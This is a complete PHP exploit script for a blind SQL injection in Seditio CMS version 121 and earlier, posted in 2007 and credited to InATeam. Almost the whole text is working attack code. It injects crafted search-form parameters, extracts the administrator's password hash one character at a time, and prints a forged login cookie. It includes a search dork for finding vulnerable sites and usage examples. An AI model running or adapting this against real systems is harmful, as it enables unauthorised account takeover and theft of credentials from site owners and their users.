seditio-sql.txt
Posted on 30 November 2007
<?php ## Seditio CMS <= 121 Remote SQL Injection Exploit ## Software site: http://www.neocrome.net/ ## By InATeam (http://inattack.ru/) ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off echo "------------------------------------------------------------ "; echo "Seditio CMS <= 121 Remote SQL Injection Exploit "; echo "(c)oded by Raz0r, InATeam (http://inattack.ru/) "; echo "dork: "Powered by Seditio" "; echo "------------------------------------------------------------ "; if ($argc<2) { echo "USAGE: "; echo "~~~~~~ "; echo "php {$argv[0]} [url] OPTIONS "; echo "[url] - target server where Seditio CMS is installed "; echo "OPTIONS: "; echo "-p=<prefix> - use specific prefix (default sed_) "; echo "-id=<id> - use specific user id (default 1) "; echo "examples: "; echo "php {$argv[0]} http://site.com/ -p=cms_ "; echo "php {$argv[0]} http://cms.site.com:8080/ -id=2 "; die; } error_reporting(0); set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $url = $argv[1]; for($i=2;$i<$argc;$i++) { if(strpos($argv[$i],"=")!==false) { $exploded=explode("=",$argv[$i]); if ($exploded[0]=='-p') $prefix = $exploded[1]; if ($exploded[0]=='-id') $id = $exploded[1]; } } if (!isset($prefix)) $prefix = "sed_"; if (!isset($id)) $id = 1; $url_parts = parse_url($url); $host = $url_parts['host']; if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; $path = $url_parts['path']; print("[~] Connecting... "); if (!getchar("<1",$i,false)) print("OK "); else die(" [-] Exploit failed "); print(" Getting hash..."); $hash=''; for ($i=1; $i<=32; $i++) { if (!getchar(">57",$i)) { $min = 48; $max = 57; } else { $min = 97; $max = 102; } for($j=$min;$j<=$max;$j++) { if (getchar("+LIKE+$j",$i)) { $hash .= chr($j); break; } } } print("[+] Done! hash - $hash "); print("[+] Cookie to log in: SEDITIO=".base64_encode($id.":_:".$hash.":_:ice")." "); function getchar($query,$pos,$status=true){ global $host,$path,$prefix,$id; if ($status) status(); $data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1"; $data.= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')"; $data.= "+AND+1=IF(ORD(MID((SELECT+user_password+FROM+{$prefix}users+WHERE"; $data.= "+user_id={$id}),{$pos},1)){$query},1,(SELECT+1+UNION+SELECT+5))/*&x=GUEST"; $packet = "POST {$path}plug.php?e=search&a=search HTTP/1.1 "; $packet .= "Host: {$host} "; $packet .= "Referer: http://{$host}{$path}plug.php?e=search&a=search "; $packet .= "User-Agent: InAttack User Agent "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Content-Length: ".strlen($data)." "; $packet .= "Connection: Close "; $packet .= $data; return (strpos(send($packet),'Subquery returns more than 1 row')===false) ? true : false; } function send($packet) { global $host,$port; $ock = fsockopen(gethostbyname($host),$port); if ($ock) { fputs($ock, $packet); $html=''; while (!feof($ock)) $html.=fgets($ock); } else die("[-] Exploit failed "); return $html; } function status() { static $n; $n++; if ($n > 3) $n = 0; if($n==0){ print " [-] "; } if($n==1){ print " [\] ";} if($n==2){ print " [|] "; } if($n==3){ print " [/] "; } }
